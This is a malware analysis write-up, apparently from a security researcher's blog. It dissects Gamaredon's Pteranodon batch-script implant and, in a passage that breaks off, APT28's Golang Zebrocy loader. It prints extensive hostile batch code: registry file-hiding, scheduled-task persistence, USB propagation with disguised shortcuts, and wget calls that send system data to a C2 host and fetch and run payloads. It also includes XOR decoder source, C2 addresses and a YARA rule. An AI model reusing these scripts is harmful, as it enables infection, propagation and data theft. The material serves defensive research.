By and large, malware analysis revealed that the embedded tools include many Russian language artifacts including Cyrillic character encoding ‚Äú1251‚ÄĚ setup (‚Äú—Ā—Ä—Āh 1251‚ÄĚ, hardcoded Russian-language staged folder “–Ě–ĺ–≤–į—Ź –ü–į–Ņ–ļ–į,” command-and-control URI parameters transliterated from Russian (e.g., “versiya“). Among other functionality, the malware has a removable drive (e.g., USB) spreader.¬†
It is notable that one of the malware tools “Crypt.exe,” which is a simple XOR encryptor, appears to be a copy/paste of the GitHub project linked to the developer under the username “asu2010” on GitHub as well as the article on the Russian portal Habrahabr¬†by another “BlackTester” referencing the same GitHub.¬†
One of the malware oddities includes the hardcoded extension “CMG”¬†in the parser, which is not used by the malware but possibly meant for chess application.
By and large, the malware chain is not sophisticated but includes a clever usage of batch script logic, leverages Windows Management Instrumentation (T1047), scheduled task (T1053), execution of¬†Microsoft HTML Applications (HTA) (mshta.exe) (T1170) and borrows open source code and well-known “wget” utility.





The malware toolkit includes an interesting method of searching files using SHELL32.DLL icons, creating .lnk shortcuts to them in, and hiding and copying the executable and saving them to removable media (\Boot\UA%RANDOM%.%%Q' and setting up a folder¬†\–Ě–ĺ–≤–į—Ź –ü–į–Ņ–ļ–į via "3" icon).¬†

II. Malware Installation: Batch '.cmd' Scripts

A. '23910.cmd' (previously known as "Wariables.cmd" and "War.cmd" combined)





To hide itself from simple detection, the script starts with setting up the variables including the creation of another script titled ‚ÄúOEPst.cmd‚ÄĚ with the registry setup via the following command and deleting right after the command via ‚Äúdel /q /f "OEPst.cmd"


"reg add
“HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
/v Hidden /t REG_DWORD /d 00000002 /f>OEPst.cmd‚ÄĚ
Next, the malware proceeds with obtaining a process list looking for ‚Äúcryptcp.exe‚ÄĚ (i.e, ‚Äútasklist /nh /fi "imagename eq cryptcp.exe‚ÄĚ) and if found deleting it via the following command: 
'tasklist /nh /fi "imagename eq cryptcp.exe" ^| 
find /c "cryptcp.exe"') do set /a LQIEv=%%W
if %LQIEv% geq 2 (
For /F "delims=" %%X In ('Dir !%CD%\*.*! /B') Do Del /Q /F "%%X"

The relevant batch script portion is as follows:

REM /////////////////////////////////////////////////////////
REM //////////////// Main Batch Caller /////////////////////
REM /////////////////////////////////////////////////////////
setlocal enableextensions
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
setlocal enabledelayedexpansion
set THHsE=cryptcp
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
set OEPst=HKCU\Software\Microsoft\Windows
If JMhfJWj==FYowDlU Set DCofHCj=BaagTQJ
set KevQM=CurrentVersion\Explorer\Advanced\
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
set wOEJD=%1_512
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
echo %wOEJD%>wOEJD
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ 
/v Hidden /t REG_DWORD /d 00000002 /f>OEPst.cmd
set tNdUKKL=%systemroot%
echo exit /b>>OEPst.cmd
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
call OEPst.cmd
set tNdUKKL=%systemroot%
del /q /f "OEPst.cmd"
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
set HgDwK="%CD%\*.*"
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
for /f %%W in ('tasklist /nh /fi "imagename eq cryptcp.exe" ^|
find /c "cryptcp.exe"') do set /a LQIEv=%%W
if %LQIEv% geq 2 (
For /F "delims=" %%X In ('Dir !%CD%\*.*! /B') Do Del /Q /F "%%X"
EXIT
)

Next, the script gets a process list via 'tasklist' and 'WMIC' via 

“tasklist /fi "PID eq !%%V!" /fo csv`) DO (set AXGPY=%%~W)
endlocal&set FUOgd=%%~W
for /f "tokens=1* delims==" %%F in (
'wmic process where "Name='%%~W'" get ExecutablePath /value^| findstr‚ÄĚ

The malware obtains the system information via 'systeminfo'¬†embedded as ‚ÄúFOR /F "tokens=*" %%V IN ('systeminfo') do @IF NOT F%%V==F set wrJbI=!wrJbI!%%V+###‚ÄĚ
The bot ID is generated via  machine name and logical disk serial name (%computername%_logicaldiskserial)
For persistence, the scheduled task is created as follows with the binary ‚Äúcryptcp.exe‚ÄĚ as copied in ‚Äú%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe‚ÄĚ

schtasks /Create /SC MINUTE /MO 11 /F /tn %VOLUME_SERIAL_NUMBER%
/tr "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"

The XOR decryption of the wget binary is performed via 2750.exe ‚Äú"15875.exe" dec "gjghj,eqhfcgfreqgbyljc" passing the hardcoded key ‚Äúgjghj,eqhfcgfreqgbyljc‚ÄĚ
Additionally, the malware checks for ‚Äú.rdata‚ÄĚ section once it downloads another sample to make sure it is a valid executable.¬†

“1>nul findstr "\" qWFDX.exe && (
start "" "%CD%\qWFDX.exe )‚ÄĚ

The relevant batch script portion is as follows:

REM /////////////////////////////////////////////////////////
REM ///////////// ParentProcess WMIC Processor //////////////
REM /////////////////////////////////////////////////////////
set tNdUKKL=%systemroot%
set FUmqD=0
set KDXmp=ParentProcessId
set eJuzm=CommandLine
set xstPC=%~nx0 // %~nx0=name of the running batch file
set lJHFE=parentprocessid
set SsgFv=commandline
set tNdUKKL=%systemroot%
for /f "usebackq tokens=1* delims==" %%U IN
(`
wmic process get !parentprocessid!^, !commandline! /value
`) DO (
if "!0!"=="1" (
if "%%U"==ParentProcessId (set zHsgx=%%V)
)
if "%%U"==CommandLine (
set cHqET=%%V
if not "!%%V:%~nx0=!"=="!%%V!" ( // %~nx0=name of the running batch file
set FUmqD=1
) else (
set FUmqD=0
)
)
)
for /f "usebackq tokens=1* skip=1 delims=," %%W
IN (`tasklist /fi "PID eq !%%V!" /fo csv`) DO (set AXGPY=%%~W)
endlocal&set FUOgd=%%~W
for /f "tokens=1* delims==" %%F in (
'wmic process where "Name='%%~W'" get ExecutablePath /value^| findstr :'
) do set IKssX=%%G
setlocal enableextensions
setlocal enabledelayedexpansion
FOR /F "tokens=*" %%V IN ('systeminfo') do @IF NOT F%%V==F set wrJbI=!wrJbI!%%V+###
set tNdUKKL=%systemroot%
set INoUg=%%G
set GSptS='vol c:'
set lJHFE="\"
for /F "delims=" %%W in (wOEJD) do set wOEJD=%%W
del /f /q "wOEJD"
For /F "skip=1 Tokens=4*" %%X In ('vol c:') Do set FaMJW=%%X
if %FaMJW%==is (
For /F "skip=1 Tokens=5*" %%U In ('vol c:') Do set FaMJW=%%U
)
set OEPst=Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%
set tNdUKKL=%systemroot%
set IHsGN=%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%
set CErlK="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0"
set tNdUKKL=%systemroot%
set IaGLD=/SC MINUTE /MO 11 /F
if not exist "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\%CD%\*.*"
(MD "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%")
set THHsE=cryptcp
if not exist "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe" (
copy /y /v "%%G" "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"
)
fc /b "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"
if %errorlevel%==1 (
RENAME "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe" BWElK
copy /y /v "%%G" "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"
del /f /q "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\BWElK"
)
set tNdUKKL=%systemroot%
set INoUg="%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"
set tNdUKKL=%systemroot%
for /d %%X in ("%TEMP%\*") do rd /q "%%X" 2>nul
schtasks /Create /SC MINUTE /MO 11 /F /tn %VOLUME_SERIAL_NUMBER%
/tr "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"
set ZbFoE=%computername%_%VOLUME_SERIAL_NUMBER:-=%
set ZbFoE=%ZbFoE: =%
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
set tNdUKKL=%systemroot%
2750.exe "15875.exe" dec "gjghj,eqhfcgfreqgbyljc"
set GYHYY=dec_15875.exe
The decoded wget binary calls the domain hxxp://torrent-stel[.]space/spr_files[.]php‚ÄĚ via the following script with the URI parameters as sysinfo=&id=&fid=&comp=&versiya= passing the file qWFDX.exe with the -O command.

dec_15875.exe --tries=3 --user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) 
Gecko/20100101 Firefox/27.0
--post-data=
"sysinfo=%wrJbI%&id=%computername_logicaldiskserial%&fid=%auUQD%
&comp=%computername%&versiya=%1_512%" "hxxp://torrent-stel[.]space/spr_files[.]php"
-q -N hxxp://torrent-stel[.]space/spr_files[.]php -O qWFDX.exe

The relevant batch script portion is as follows:

REM /////////////////////////////////////////////////////////
REM /////////////////// Post Caller Routine /////////////////
REM /////////////////////////////////////////////////////////
:EgEbd
set /a LJEmW=110*%RANDOM%/32768
set tNdUKKL=%systemroot%
timeout /t 110*%RANDOM%/32768
set auUQD=0
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
Call 22944.cmd %auUQD%
if %auUQD%==0 goto qWFDX
If Not Exist %pyBIa% goto qWFDX
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
echo .>"%pyBIa%\ATjDm"
IF EXIST "%pyBIa%\ATjDm" (
del /f /q "%pyBIa%\ATjDm"
call 15485.cmd %APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%
cryptcp "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe" %auUQD% %pyBIa%
)
set tNdUKKL=%systemroot%
ping 8.8.8.8 |>nul find /i "TTL=" &&goto qWFDX||goto EgEbd
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%

:qWFDX
if %auUQD%==0 set auUQD=000000
set GXwVw=torrent-stel
set BmrwP=space
set jKDtC=spr_files.php
set downs_telo=qWFDX.exe
set DCInJ=hxxp://torrent-stel[.]space/spr_files[.]php
call :OUJHJ qWFDX.exe
dec_15875.exe --tries=3 --user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
--post-data=
"sysinfo=%wrJbI%&id=%computername_logicaldiskserial%&fid=%auUQD%&comp=%computername%&versiya=%1_512%"
"hxxp://torrent-stel[.]space/spr_files[.]php" -q -N 
hxxp://torrent-stel[.]space/spr_files[.]php -O qWFDX.exe
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
call :OUJHJ dec_15875.exe
1>nul findstr "\" qWFDX.exe && (
start "" "%CD%\qWFDX.exe"
)
If JMhfJWj==FYowDlU Set DCofHCj=BaagTQJ

:DgGTz
set GXwVw=torrent-supd
set jKDtC=spr_updates.php
set DCInJ=hxxp://torrent-stel[.]space/spr_files[.]php
set downs_telo=OUJHJ
dec_15875.exe --tries=3 --user-agent=%CErlK%
--post-data=
"sysinfo=%wrJbI%&id=%computername_logicaldiskserial%&fid=%auUQD%&comp=%computername%&versiya=%1_512%"
"hxxp://torrent-stel[.]space/spr_files[.]php" -q -N 
hxxp://torrent-stel[.]space/spr_files[.]php -O OUJHJ
call :OUJHJ dec_15875.exe
set tNdUKKL=%systemroot%
2750.exe "OUJHJ" dec "gjghj,eqhfcgfreqgbyljc"
timeout /t 110*%RANDOM%/32768
set /a LJEmW=3*%RANDOM%/32768
set tNdUKKL=%systemroot%
1>nul findstr "\" dec_OUJHJ && (
taskkill /f /im cryptcp.exe
RENAME "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER\cryptcp.exe" BWElK
timeout /t 3*%RANDOM%/32768
copy /y /v "dec_OUJHJ" "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER\cryptcp.exe"
start "" "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"
timeout /t 3*%RANDOM%/32768
del /q /f "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\BWElK"
for /d %%F in ("%TEMP%\*") do rd /q "%%F" 2>nul
del /q /f "%CD%\*.*%"
exit /b
)
for /F %%U in ('tasklist /FI "imagename eq cryptcp.exe" ^| find /C "cryptcp.exe"') do set /a LQIEv=%%U
if %LQIEv% LSS 1 (
start "" "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"
exit /b
)
goto EgEbd

:OUJHJ
tasklist /fi "IMAGENAME eq %1" | find /i "%1"
if not errorlevel 1 taskkill /f /im %1
exit /b

B. '22944.cmd' (previously known as "id.cmd")
The file generates a removate drive disk name leveraging WMI DriveType=2 (removable drive) via the following query:
WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) Get Name^,VolumeSerialNumber /Value^|Find "="'
The relevant batch script portion is as follows:

REM ///////////////////////////////////////////////////////////
REM /////////////// Removable Drive Searcher ID ///////////////
REM ///////////////////////////////////////////////////////////
set BgElHCr=%DATE%
set auUQD=0
set BgElHCr=%DATE%
For /F "Tokens=1,2* Delims==" %%A In
('WMIC LogicalDisk Where ^(DriveType^=2 And MediaType^=NULL^) '
'Get Name^,VolumeSerialNumber /Value^|Find "="') Do (
set aaHDX=%%A
set ubKsB=%%B
Call :LQIEv %%A %%B
set BaagTQJ=%random%
set BgElHCr=%DATE%
exit /b
If JMhfJWj==FYowDlU Set DCofHCj=BaagTQJ
set BgElHCr=%DATE%
:LQIEv
if %DATE%==pXZLiQl set JMhfJWj=%LOCALAPPDATA%
Set auUQD=0
set BaagTQJ=%random%
Set $%aaHDX%=%%B
set BgElHCr=%DATE%
If %aaHDX%==VolumeSerialNumber If Defined %%B (Set pyBIa=%$Name%& Set auUQD=%$VolumeSerialNumber%)
set BgElHCr=%DATE%
exit /b

C. '15485.cmd' (previously known as "usb.cmd")
The script logic is responsible for malware removable drive propagation.
It changes the character encoding to "1251" via 'chcp 1251>NULL', which is an 8-bit character encoding, designed to cover languages that use the Cyrillic script such as Russian, Bulgarian, Serbian Cyrillic, and other languages. The malware copies the file to \Boot as win.exe and setting it up with the hidden view as ‚Äúattrib -h -s win.exe‚ÄĚ
The relevant batch script portion is as follows:

REM ///////////////////////////////////////////////////////////
REM /////////////// Removable Drive Searcher ID ///////////////
REM ///////////////////////////////////////////////////////////
setlocal enableextensions
setlocal enabledelayedextensions
chcp 1251 > NULL
set BgElHCr=%USERPROFILE%
set KcIdg=%pyBIa%\win.exe
...
if not defined tQWEd set "tQWEd=%ProgramFiles(x86)%\WinRAR\WinRAR.exe"
REM Win32_LogicalDisk class = Name -> pyBIa
set KcIdg=%pyBIa%\win.exe
set tqEDS=mshta
set "fAFZD=attrib -h -s win.exe"
set "AaBUG=start /b win.exe"
REM %fAFZD% -> 'attrib -h -s win.exe'
REM %AaBUG% -> 'start /b win.exe'
call :qWFDX %fAFZD% %AaBUG%
If Not Exist %pyBIa%\Boot (
MD %pyBIa%\Boot
)
for /f "Tokens=1* Delims=" %%H in ('dir /b/s %pyBIa%\win.exe') do
(copy "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe" "%%H" /y)
for /f "Tokens=1* Delims=" %%I in ('dir /b/s "%pyBIa%\*.exe"')
do (
copy /y /v "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe" "%%I"
set SEFTP=%%~nxI
REM ~nxI expands %I to a file name and extension only
rename "%%I" !SEFTP: =!
)
for /f "Tokens=1* delims=" %%P in ('dir /b/s "%pyBIa%\*.lnk.lnk"') do (RENAME "%%P" %%~nP)
for /f "Tokens=1* Delims=" %%Q in ('dir /s /b %SystemRoot%\Installer\wordicon.exe')
do (set Rvjvq_doc=%%Q)
for /f "Tokens=1* Delims=" %%I in ('dir /s /b %SystemRoot%\Installer\x1icons.exe')
do (set Rvjvq_xls=%%I)
for %%Q in (doc rtf rar zip CMG txt xls) do (
set KHByE=0
set lOkEy=%%Q
for /f "tokens=*" %%M in ('dir /b /s /a "%pyBIa%\*.%%Q"') do (
if /i not %%~pM==\Boot\ (
set dels_!KHByE!=%%M
set /a KHByE+=1
)
)
call :DgGTz %KHByE% %lOkEy%
for /f "Tokens=1* Delims=" %%N in ('dir /b/s "%pyBIa%\*.lnk"') do (
If Not Exist "%%~dpN win.exe" (
copy /y /v "%APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe"
"%%~dpN+win.exe"
REM from 23910 -> %%~dpN -> get the whole pathname from root
)
)
echo attrib +h +s /s %pyBIa%\win.exe>cHqET.cmd
echo attrib +h %pyBIa%\Boot\*.*>>cHqET.cmd
echo attrib +h +s /d /s %pyBIa%\Boot>>cHqET.cmd
echo exit /b>>cHqET.cmd
call cHqET.cmd
EXIT /B

The malware executes various commands uses mshta.exe to process document icons and creates shortcuts to them in the \Boot\UA%RANDOM%.%%Q' and setting up a folder¬†\–Ě–ĺ–≤–į—Ź –ü–į–Ņ–ļ–į via "3" icon.
The relevant batch script portion is as follows:

REM /////////////////////////////////////////////////////////
REM /////////////////// Icon Document Processor //////////////
REM /////////////////////////////////////////////////////////
:qWFDX
copy %APPDATA%\Microsoft\Crypto\keys\%VOLUME_SERIAL_NUMBER%\cryptcp.exe "%pyBIa%\win.exe" /y
set "vJiGq=%pyBIa%\–Ě–ĺ–≤–į—Ź –Ņ–į–Ņ–ļ–į"
set GpaYX="/C attrib -h -s win.exe & attrib -h -s win.exe & %windir%\explorer.exe"
set jlxNK=%SystemRoot%\system32\SHELL32.dll
call :BWElK %pyBIa%\–Ě–ĺ–≤–į—Ź –Ņ–į–Ņ–ļ–į /C attrib -h -s win.exe & attrib -h -s win.exe & %windir%\explorer.exe %SystemRoot%\system32\SHELL32.dll 3

:DgGTz
if %KHByE%==0 exit /b
set /a DdRep=%random% %% %KHByE%
set hLGGi=!dels_%%random% %% %KHByE%%!
set JrbyC=%RANDOM%
copy /y !dels_%%random% %% %KHByE%%! "%pyBIa%\Boot\UA%RANDOM%.%%Q"
set IhLOk="/C attrib -h -s win.exe & %start /b win.exe & Boot\UA%RANDOM%.%%Q"
If JMhfJWj==FYowDlU Set DCofHCj=BaagTQJ
set jlxNK=%SystemRoot%\system32\SHELL32.dll
set BgElHCr=%USERPROFILE%
set HJSmw=49
set FYowDlU=DCofHCj
if %%Q==doc (
set %SystemRoot%\system32\SHELL32.dll=%%Q
set HJSmw=1
)
set BgElHCr=%USERPROFILE%
if %%Q==rtf (
set %SystemRoot%\system32\SHELL32.dll=%%Q
set HJSmw=1
)
set BgElHCr=%USERPROFILE%
if %%Q==txt (
set HJSmw=70
)
set FYowDlU=DCofHCj
if %%Q==xls (
set %SystemRoot%\system32\SHELL32.dll=%%I
set HJSmw=1
)
if %%Q==rar (
set "%SystemRoot%\system32\SHELL32.dll=%ProgramFiles%\WinRAR\WinRAR.exe"
set HJSmw=101 // %ProgramFiles(x86)%
)
if %%Q==zip (
set "%SystemRoot%\system32\SHELL32.dll=%ProgramFiles%\WinRAR\WinRAR.exe" // %ProgramFiles(x86)%
set HJSmw=101
)
set BgElHCr=%USERPROFILE%
call :BWElK !dels_%%random% %% %KHByE%%! /C attrib -h -s win.exe & %start /b win.exe & Boot\UA%RANDOM%.%%Q %SystemRoot%\system32\SHELL32.dll %HJSmw%
del /f /q !dels_%%random% %% %KHByE%%!
EXIT /B

The malware executes hiding and Shell32 icon processor via mshta.exe vbscript.
The relevant batch script portion is as follows:
REM /////////////////////////////////////////////////////////
REM /////////////////// MSHTA.exe Icon //////////////
REM /////////////////////////////////////////////////////////
:BWElK
start "" mshta.exe vbscript:Execute
("Set y=CreateObject(""WScript.Shell"").
CreateShortcut(""!dels_%%random% %% %KHByE%%!.lnk""):
y.TargetPath=""%comspec%"":
y.Arguments="/C attrib -h -s win.exe & %start /b win.exe & Boot\UA%RANDOM%.%%Q:
y.WindowStyle=7:y.IconLocation=""%SystemRoot%\system32\SHELL32.dll, %HJSmw%""
:y.Save():Close()")
set BgElHCr=%USERPROFILE%
EXIT /B

III. Decoding Xor Utility 2750.exe (previously known as "Crypt.exe")
Finally, the malware uses the utility "Crypt.exe" to decode the XOR-obfuscated code to obtain the original wget binary for network communication.
Essentially, compiled in MingW libgcj-13.dll, this executable is a simple XOR encryption/decryption utility, which is heavily commented in Russian and with the Russian language resource
The default Russian-language commands are as follows:

–ó–į—ą–ł–≤—Ä–ĺ–≤–į—ā—Ć  enc  (encode  enc )
–Ē–Ķ—ą–ł–≤—Ä–ĺ–≤–į—ā—Ć dec (decode enc )

It is notable that one of the malware tools "Crypt.exe," which is a simple XOR encryptor, appears to be a copy/paste of the GitHub project linked to the developer under the username "asu2010" on GitHub as well as the article on the Russian portal Habrahabr by another "BlackTester" referencing the same GitHub. 

/////////////////////////////////////////////////////////
/////////////////// XOR Decryption Routine //////////////
/////////////////////////////////////////////////////////
unsigned char XOR(unsigned char inByte, unsigned char keyByte)
{
return inByte ^ keyByte;
}
void DecodeFile(FILE* inFile, FILE* outFile, char* keyString)
{
int Count;
unsigned char inByte;
unsigned char outByte;
Count = strlen(keyString)-1;
while(1)
{
inByte = getc(inFile);
if(feof(inFile)) break;
if(!Count) Count = (strlen(keyString) - 1);
outByte = XOR(inByte, (unsigned char)keyString[Count]);
Count--;
fputc((int)outByte, outFile);
}
}

IV. "dec_15875.exe" wget Binary
The decoded utility is simply a "wget" binary, which is used for clientserver communications.

V. Yara Signature

rule apt_win32_gamaredon_pteranodon_initial_sfx {
meta:
author = "@VK_Intel"
reference = "Detects Gamaredon Group Pteranodon Implant"
date = "2018-12-27"
type = "experimental"
strings:
$s0 = "cryptcp.exe" fullword wide
$s1 = "SFX module - Copyright (c) 2005-2012 Oleg Scherbakov" fullword ascii
$s2 = "7-Zip archiver - Copyright (c) 1999-2011 Igor Pavlov" fullword ascii
$s3 = "RunProgram=\"hidcon" fullword ascii
$s4 = "7-Zip - Copyright (c) 1999-2011 " fullword ascii
$s5 = "sfxelevation" fullword wide
$s6 = "Error in command line:" fullword ascii
$s7 = "%X - %03X - %03X - %03X - %03X" fullword wide
$s8 = "- Copyright (c) 2005-2012 " fullword ascii
$s9 = "Supported methods and filters, build options:" fullword ascii
$s10 = "Could not overwrite file \"%s\"." fullword ascii
$s11 = "7-Zip: Internal error, code 0x%08X." fullword ascii
$s12 = "@ (%d%s)" fullword wide
$s13 = "SfxVarCmdLine0" fullword wide
$s14 = "SfxVarCmdLine1" fullword wide
$s15 = "SfxVarCmdLine2" fullword wide
      $cmd = ".cmd" fullword wide

condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and 14 of them and $cmd) }

Let’s Learn: Progression of APT28/Sofacy Golang Zebrocy Loader ‘Project2.Go’: WMIC & Hex Decode

Goal: Document the progression of the Zebrocy (aka Zepakab) Golang loader as leveraged by the APT28/Sofacy group.

Source:
UPX-compressed APT28 Zebrocy sample (MD5: 6bc5f53d4082f12dd83aca45bae81e64)
Outline:

I. Background & Summary
II. Zebrocy main* Functions
A. main_asduiwom663721 (WMIC disk parser function)
B. main_dassdwdfgsd3321 (aka "main_getfilename")
C. main_xcmkksja1 (aka "main_CreateSysinfo")
III. Yara Signature

Background & Summary:

Since the previous analysis of the “ProjectC1Dec” Zebrocy loader, the APT28 (also known as Sofacy, Fancy Bear, STRONTIUM, Pawn Storm, and Sednit) group appears to have modified the code to leverage WMIC for host profiling rather than leveraging the GitHub code, taken from the open source repository¬†iamacarpet/go_win64api¬†(thanks to¬† / & ¬†for the original hunting discovery).

The APT28 group continues to leverage UPX rather for binary compression to deliver the Golang Zebrocy binary.

This project debugging path of the “GoLand” project appears to be as follows:
“C:/=!=/GoLand/Project1_HEX/Project2.go”¬†

While the previous one was as follows:
C:/!Project/C1/ProjectC1Dec/main.go

The main differences appear¬†to be the usage of hex encoding throughout the application to hide various variables as well as changed main function names coupled with the usage of “WMIC” to query system information. It also appears that the latest Golang Zebrocy dropped the usage of the GitHub code from¬†iamacarpet/go_win64api¬†(ProcessList, InstalledSoftwareList, ListLoggedInUsers,SessionDetails/FullUser),¬†shirou_gopsutil¬†(host_Info) while maintained the screenshot support from the open source library¬†kbinani/screenshot(NumActiveDisplays, GetDisplayBounds, CaptureRect).

It is also notable that the command-and-control server continues to be hosted on the Qhoster 89.37.226.* range ASN AS60068. The previous server was hosted at .*123 while the latest one is at *.148.
Additionally, the observed “Run” registry key is “Driveupd”
The malware capabilities include installation in¬†HKCU registry¬†as “Driveupd” and locally in %APPDATA%, leveraging “WMIC” execution via “cmd”, profiling a victim system (in this case, leveraging “WMIC“, obtaining desktop¬†screenshots, and sending the data to the server. The specific host profiling¬†WMIC command the malware passes is “wmic logicaldisk get caption,description,drivetype,providername,size“.

The client-server communication passes the “support?6t1d %” parameter to the URL¬†¬†hxxp://89[.]37[.]226[.148/technet-support/library/online-service-description.php?id_name=.

II. Zebrocy main* Functions

This Project2.go compiled sample contains changed function names as mapped to the previous sample from the previous analysis:

main_main
main_init
main_asduiwom6633 -> new hex decoder function
main_asduiwom663721 -> WMIC disk parser
main_dassdwdfgsd3321 -> main_getfilename
main_asduiwom663723 -> parser function
main_asduiwom66372 -> main_CMDRunAndExit
main_xcmkksja1 -> main_CreateSysinfo
main_jjdskasdhhfud00 -> main_ParseData
main_sg383820kks -> main_SendPOSTRequests
main_Bubugaga -> main_Screen       
main_uuettdh666 -> main_GetSND
main_asduiwom66311 -> convert to string
Additionally, the malware heavily relies on the hex decoder function with multiple xrefs to decode hex-encoded parameters.
A. main_asduiwom663721 (WMIC disk parser function)
The “main_asduiwom663721″ function parses host for driver information leveraging the following command executing via os/exec Golang library:

wmic logicaldisk get caption,description,drivetype,providername,size

The pseudo-coded C++ function of the Golang compiled binary is as follows:

////////////////////////////////////////////////
//// APT28 main WMIC disk parser Function //////
////////////////////////////////////////////////

int main_asduiwom663721()
{

...

  while ( (unsigned int)&retaddr <= *(_DWORD *)(*(_DWORD *)__readfsdword(20) + 8) )
    runtime_morestack_noctxt();
  main_asduiwom6633((int)&byte_63BCBB, 6);
  main_asduiwom6633((int)byte_63B871, 4);
  main_asduiwom6633((int)&word_64CD0E, 136); 
// "wmic logicaldisk get caption,description,drivetype,providername,size"
  v12 = v6;
  v13 = v8;
  v14 = v6;
  v15 = v8;
  os_exec_Command(v6, v8, &v12, 2, 2);
  runtime_newobject(dword_61A320, v0);
  *v5 = 1;
  v1 = v11;
  v2 = *(_BYTE *)v11;
  if ( dword_790550 )
  {
    runtime_writebarrierptr();
    v1 = v11;
  }
  else
  {
    *(_DWORD *)(v11 + 76) = v5;
  }
  os_exec__ptr_Cmd_CombinedOutput(v1, v5, v7, v9, v10);
  runtime_slicebytetostring(0);
  return v3;
}
B. main_dassdwdfgsd3321¬†(aka¬†“main_getfilename“)
The “main_dassdwdfgsd3321” function (previously “main_getfilename”) simply checks for the existence of itself in ‘%APPDATA%\Identities\{83AF1378-986F-1673-091A-02681FA62C3B’} as ‘w32srv.exe’.
The pseudocoded C++ Go function is as follows:
////////////////////////////////////////////////
////// APT28 Zebrocy Go main_dassdwdfgsd3321 ///
////// GetFileName Function ////////////////////
////////////////////////////////////////////////

int main_dassdwdfgsd3321()
{

...

  while ( (unsigned int)&retaddr <= *(_DWORD *)(*(_DWORD *)__readfsdword(20) + 8) )
    runtime_morestack_noctxt();
  // %APPDATA%
  main_asduiwom6633((int)byte_63E145, 14);      
  os_Getenv();
  // \\Identities\\{83AF1378-986F-1673-091A-02681FA62C3B}
  main_asduiwom6633((int)&word_64C8DA, 104);   
  runtime_concatstring2(0, v2, v3, v2, v3);
  os_MkdirAll();
  main_asduiwom6633((int)byte_63E145, 14);
  os_Getenv();
  main_asduiwom6633((int)&word_64CB06, 128);    // \\w32srv.exe
  runtime_concatstring2(0, 1, v0, 1, v0);
  return v4;
}

C. main_xcmkksja1 (aka “main_CreateSysinfo”)
The “main_xcmkksja1” function (previously “main_CreateSysinfo”)¬†formats concatenates host information with the¬†appended “systeminfo”, “tasklist”, and “PrgStart: “
The pseudocoded C++ Go function is as follows:

////////////////////////////////////////////////
////// Zebrocy Go Function /////////
////////////////////////////////////////////////

int main_xcmkksja1()
{

...

  while ( (unsigned int)&v24 <= *(_DWORD *)(*(_DWORD *)__readfsdword(20) + 8) )
    runtime_morestack_noctxt();
  main_asduiwom6633(byte_6409C9, 20, v6, v7);   // 'systeminfo'
  main_asduiwom663723(v6, v7, v6, v7);
  v13 = v7;
  v19 = v6;
  main_asduiwom6633("7461736B6C697374: value of type :VerifyDNSLengthAddDllDirectory", 16, v6, v7);
  main_asduiwom663723(v6, v7, v6, v7);          // 'tasklist'
  v16 = v7;
  v22 = v6;
  os_Executable(v4, v5, v6, v7);
  if ( v6 )
  {
    v0 = 6;
    v1 = &byte_63BD1B;
  }
  else
  {
    v1 = v4;
    v0 = v5;
  }
  v15 = v0;
  v21 = v1;
